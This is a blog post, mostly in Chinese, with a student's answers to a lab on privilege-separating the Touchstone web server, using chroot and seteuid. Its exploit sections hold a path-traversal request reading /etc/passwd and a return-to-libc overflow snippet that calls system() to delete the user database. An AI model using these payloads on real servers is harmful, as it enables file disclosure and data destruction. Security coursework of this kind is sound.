关闭

Lab3 Privilege Separation

标签: 信息安全权限分离
719人阅读 评论(1) 收藏 举报
分类:

Lab Overview

In this lab, you’ll explore privilege separation. The key insight of privilege separation is to give minimal privilege to each component of a system, so that when one component of the system is comprised, other components will not be comprised too.
To make the discussion concrete, you will do this lab for the Touchstone web server, that is, you will privilege-separate the Touchstone web server by giving each component appropriate privilege. To be specific, you will first examine possible bugs in the source code of the Touchstone web server, and comprise the Touchstone web server by designing and performing exploitations. Finally, you will break up the application into privilege-separated components to minimize the effects of possible vulnerabilities.

This lab consists of three parts:
Part A: you will examine the architecture of the Touchstone web server. The Touchstone web server in this lab differs dramatically from those from lab 1 and 2, the current one is based on the idea of services;
Part B: you will explore jail, by which you can constraint the service in some fake root directory;
Part C: you will privilege-separate the Touchstone web server by assigning each component appropriate privilege.

Exercise 1

如果运行touchstone出现如下情况

这里写图片描述

关闭apache即可:

$ sudo /etc/init.d/apache2 stop

这里写图片描述
这里写图片描述


Exercise 2

这里我们增加一个保存上次登录时间的功能。
修改init_db()函数,增加“date”字段:

这里写图片描述

在sqlhelper.c中增加函数get_date()用于获取上次登录时间:

这里写图片描述

增加函数update_data()用于更新数据库:

这里写图片描述

修改register_db()函数,使得注册的时候保存当前时间为注册时间:

这里写图片描述

在Handle_post()函数中应该修改调用为register_db(name, pwd, datetime),同时登录时应把注册时间显示在网页上。

这里写图片描述


Exercise 3

观察hadleGet()函数:

这里写图片描述

要访问/etc/passwd文件,只需让uri等于passwd的相对路径即可,因此只需把请求修改为

 char *req ="GET /../../../../../etc/passwd HTTP/1.1\r\n\r\n";

这里写图片描述


Exercise 4

在server.c的main()函数中调用chroot()函数即可:

 chroot("/jail");

这里写图片描述


Exercise 5

这里和Lab 2类似,不做过多阐述:

这里写图片描述

int main()
{
    ...
    char *shellcode = "rm db/users.db";
    char req[1080];
    int i = 0;
    memset(req,'a',strlen(req));
    for(;i < strlen(shellcode);i ++)
      req[i] = shellcode[i];
    req[i] = '\0';
    req[2] = 9;
    *((int *)&req[1064]) = 0xb7fcee10;    //system
    *((int *)&req[1072]) = 0xbfffeeb4;    //&s
    req[1076] = '\r';
    req[1077] = '\n';
    req[1078] = '\r';
    req[1079] = '\n';
    ...
}

Exercise 6

由于/jail目录所有者为root,因此只需在调用httpd前设置e_uid为普通用户(即非0)即可:

seteuid(1000);

Exercise 7

不能成功。攻击时服务器端会出现删除文件的提示,因为执行删除命令的httpd已经不再是以root身份运行。即使同意删除,也会因为权限而删除失败。

这里写图片描述


Challenge


Resource

1
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:33899次
    • 积分:646
    • 等级:
    • 排名:千里之外
    • 原创:36篇
    • 转载:1篇
    • 译文:0篇
    • 评论:9条
    文章分类
    最新评论